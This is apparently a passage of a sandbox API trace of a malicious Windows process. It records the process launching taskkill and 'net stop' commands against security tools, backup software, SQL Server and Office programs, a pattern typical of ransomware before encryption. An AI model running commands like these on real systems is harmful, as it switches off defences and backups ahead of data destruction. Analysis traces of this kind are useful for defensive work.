hStdError=0x0), lpProcessInformation=0x24e7d20 | out: lpCommandLine="\"taskkill.exe\" /IM encsvc.exe /F", lpProcessInformation=0x24e7d20*(hProcess=0x478, hThread=0x50c, dwProcessId=0x11b8, dwThreadId=0x4a0)) returned 1 [0147.944] CloseHandle (hObject=0x4b0) returned 1 [0147.944] GetFileType (hFile=0x174) returned 0x3 [0147.944] CloseHandle (hObject=0x50c) returned 1 [0147.944] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.944] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x50c, hWritePipe=0x6daef04*=0x4b0) returned 1 [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] GetCurrentProcess () returned 0xffffffff [0147.944] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x558) returned 1 [0147.944] CloseHandle (hObject=0x50c) returned 1 [0147.944] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.944] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.944] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.944] CoTaskMemFree (pv=0x741d20) [0147.945] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM excel.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee50*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2508218 | out: lpCommandLine="\"taskkill.exe\" /IM excel.exe /F", lpProcessInformation=0x2508218*(hProcess=0x580, hThread=0x50c, dwProcessId=0x67c, dwThreadId=0xfec)) returned 1 [0147.965] CloseHandle (hObject=0x4b0) returned 1 [0147.965] GetFileType (hFile=0x558) returned 0x3 [0147.966] CloseHandle (hObject=0x50c) returned 1 [0147.966] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.966] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x50c, hWritePipe=0x6daef04*=0x4b0) returned 1 [0147.966] GetCurrentProcess () returned 0xffffffff [0147.966] GetCurrentProcess () returned 0xffffffff [0147.966] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x540) returned 1 [0147.966] CloseHandle (hObject=0x50c) returned 1 [0147.967] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.967] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.967] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.967] CoTaskMemFree (pv=0x741d20) [0147.967] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM infopath.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee4c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x250bb68 | out: lpCommandLine="\"taskkill.exe\" /IM infopath.exe /F", lpProcessInformation=0x250bb68*(hProcess=0x5a8, hThread=0x50c, dwProcessId=0xd58, dwThreadId=0x13c8)) returned 1 [0148.951] CloseHandle (hObject=0x4b0) returned 1 [0148.962] GetFileType (hFile=0x540) returned 0x3 [0148.963] CloseHandle (hObject=0x50c) returned 1 [0149.561] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.561] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x4b0, hWritePipe=0x6daef04*=0x504) returned 1 [0149.561] GetCurrentProcess () returned 0xffffffff [0149.561] GetCurrentProcess () returned 0xffffffff [0149.561] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x4a4) returned 1 [0149.561] CloseHandle (hObject=0x4b0) returned 1 [0149.562] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.562] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.562] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.562] CoTaskMemFree (pv=0x741d20) [0149.562] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mbamtray.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee4c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x227b2fc | out: lpCommandLine="\"taskkill.exe\" /IM mbamtray.exe /F", lpProcessInformation=0x227b2fc*(hProcess=0x418, hThread=0x4b0, dwProcessId=0x107c, dwThreadId=0x1158)) returned 1 [0149.569] CloseHandle (hObject=0x504) returned 1 [0149.570] GetFileType (hFile=0x4a4) returned 0x3 [0149.570] CloseHandle (hObject=0x4b0) returned 1 [0151.072] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0151.072] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x504, hWritePipe=0x6daef04*=0x558) returned 1 [0151.072] GetCurrentProcess () returned 0xffffffff [0151.072] GetCurrentProcess () returned 0xffffffff [0151.072] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x5b0) returned 1 [0151.072] CloseHandle (hObject=0x504) returned 1 [0151.072] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0151.072] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0151.072] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0151.072] CoTaskMemFree (pv=0x741d20) [0151.072] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM zoolz.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee50*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x251ee70 | out: lpCommandLine="\"taskkill.exe\" /IM zoolz.exe /F", lpProcessInformation=0x251ee70*(hProcess=0x59c, hThread=0x504, dwProcessId=0xdc0, dwThreadId=0x72c)) returned 1 [0151.088] CloseHandle (hObject=0x558) returned 1 [0151.088] GetFileType (hFile=0x5b0) returned 0x3 [0151.088] CloseHandle (hObject=0x504) returned 1 [0151.942] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0151.942] CreatePipe (in: hReadPipe=0x6daef08, hWritePipe=0x6daef04, lpPipeAttributes=0x6daee88, nSize=0x0 | out: hReadPipe=0x6daef08*=0x504, hWritePipe=0x6daef04*=0x558) returned 1 [0151.943] GetCurrentProcess () returned 0xffffffff [0151.943] GetCurrentProcess () returned 0xffffffff [0151.943] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6daef0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6daef0c*=0x5e0) returned 1 [0151.943] CloseHandle (hObject=0x504) returned 1 [0151.943] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0151.943] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0151.943] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0151.943] CoTaskMemFree (pv=0x741d20) [0151.943] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" IM thunderbird.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6daee48*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x259988c | out: lpCommandLine="\"taskkill.exe\" IM thunderbird.exe /F", lpProcessInformation=0x259988c*(hProcess=0x5dc, hThread=0x504, dwProcessId=0xed4, dwThreadId=0x1050)) returned 1 [0152.261] CloseHandle (hObject=0x558) returned 1 [0152.261] GetFileType (hFile=0x5e0) returned 0x3 [0152.261] CloseHandle (hObject=0x504) returned 1 [0152.278] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.572] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.704] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.780] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.828] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.893] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.963] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.972] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.046] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.063] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.077] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.080] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.087] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.104] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.108] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.127] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.131] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.136] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.141] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.197] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.211] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.244] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.318] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.360] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.591] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.717] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.106] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.166] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.186] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.189] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.620] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.624] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0178.759] CoUninitialize () Thread: id = 717 os_tid = 0xef8 [0125.775] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0125.776] CoGetContextToken (in: pToken=0x6f7f144 | out: pToken=0x6f7f144) returned 0x0 [0125.776] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f7f168 | out: ppvObject=0x6f7f168*=0x6ded34) returned 0x0 [0125.776] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x6f7f194 | out: pThreadType=0x6f7f194*=0) returned 0x0 [0125.776] IUnknown:Release (This=0x6ded34) returned 0x1 [0125.776] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0125.776] CoUninitialize () [0129.609] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.609] CreatePipe (in: hReadPipe=0x6f7eac8, hWritePipe=0x6f7eac4, lpPipeAttributes=0x6f7ea48, nSize=0x0 | out: hReadPipe=0x6f7eac8*=0x3cc, hWritePipe=0x6f7eac4*=0x444) returned 1 [0129.610] GetCurrentProcess () returned 0xffffffff [0129.610] GetCurrentProcess () returned 0xffffffff [0129.610] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6f7eacc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6f7eacc*=0x518) returned 1 [0129.610] CloseHandle (hObject=0x3cc) returned 1 [0129.610] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.610] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0129.610] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0129.610] CoTaskMemFree (pv=0x741d20) [0129.610] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop WRSVC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6f7ea10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x22782dc | out: lpCommandLine="\"net.exe\" stop WRSVC /y", lpProcessInformation=0x22782dc*(hProcess=0x570, hThread=0x3cc, dwProcessId=0x1248, dwThreadId=0xc6c)) returned 1 [0130.227] CloseHandle (hObject=0x444) returned 1 [0130.227] GetFileType (hFile=0x518) returned 0x3 [0130.227] CloseHandle (hObject=0x3cc) returned 1 [0134.429] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.429] CreatePipe (in: hReadPipe=0x6f7eac8, hWritePipe=0x6f7eac4, lpPipeAttributes=0x6f7ea48, nSize=0x0 | out: hReadPipe=0x6f7eac8*=0x444, hWritePipe=0x6f7eac4*=0x448) returned 1 [0134.430] GetCurrentProcess () returned 0xffffffff [0134.430] GetCurrentProcess () returned 0xffffffff [0134.430] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6f7eacc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6f7eacc*=0x52c) returned 1 [0134.430] CloseHandle (hObject=0x444) returned 1 [0134.430] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.430] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.430] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.430] CoTaskMemFree (pv=0x741d20) [0134.430] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop mssql$vim_sqlexp /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6f7ea0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2276848 | out: lpCommandLine="\"net.exe\" stop mssql$vim_sqlexp /y", lpProcessInformation=0x2276848*(hProcess=0x590, hThread=0x444, dwProcessId=0x11f8, dwThreadId=0x11e8)) returned 1 [0134.436] CloseHandle (hObject=0x448) returned 1 [0134.437] GetFileType (hFile=0x52c) returned 0x3 [0134.437] CloseHandle (hObject=0x444) returned 1 [0138.847] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0138.847] CreatePipe (in: hReadPipe=0x6f7eac8, hWritePipe=0x6f7eac4, lpPipeAttributes=0x6f7ea48, nSize=0x0 | out: hReadPipe=0x6f7eac8*=0x518, hWritePipe=0x6f7eac4*=0x4f4) returned 1 [0138.847] GetCurrentProcess () returned 0xffffffff [0138.847] GetCurrentProcess () returned 0xffffffff [0138.847] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6f7eacc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6f7eacc*=0x448) returned 1 [0138.847] CloseHandle (hObject=0x518) returned 1 [0138.847] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0138.847] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0138.847] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0138.847] CoTaskMemFree (pv=0x741d20) [0138.847] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop vapiendpoint /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6f7ea10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f4, hStdError=0x0), lpProcessInformation=0x227543c | out: lpCommandLine="\"net.exe\" stop vapiendpoint /y", lpProcessInformation=0x227543c*(hProcess=0x4b0, hThread=0x518, dwProcessId=0xb38, dwThreadId=0x5c8)) returned 1 [0139.186] CloseHandle (hObject=0x4f4) returned 1 [0139.186] GetFileType (hFile=0x448) returned 0x3 [0139.186] CloseHandle (hObject=0x518) returned 1 [0139.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.570] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.603] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.459] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.596] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.936] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.532] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.587] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.764] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.767] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.888] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.888] CreatePipe (in: hReadPipe=0x6f7eac8, hWritePipe=0x6f7eac4, lpPipeAttributes=0x6f7ea48, nSize=0x0 | out: hReadPipe=0x6f7eac8*=0x50c, hWritePipe=0x6f7eac4*=0x4b0) returned 1 [0147.889] GetCurrentProcess () returned 0xffffffff [0147.889] GetCurrentProcess () returned 0xffffffff [0147.889] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6f7eacc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6f7eacc*=0x448) returned 1 [0147.889] CloseHandle (hObject=0x50c) returned 1 [0147.889] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.889] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.889] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.889] CoTaskMemFree (pv=0x741d20) 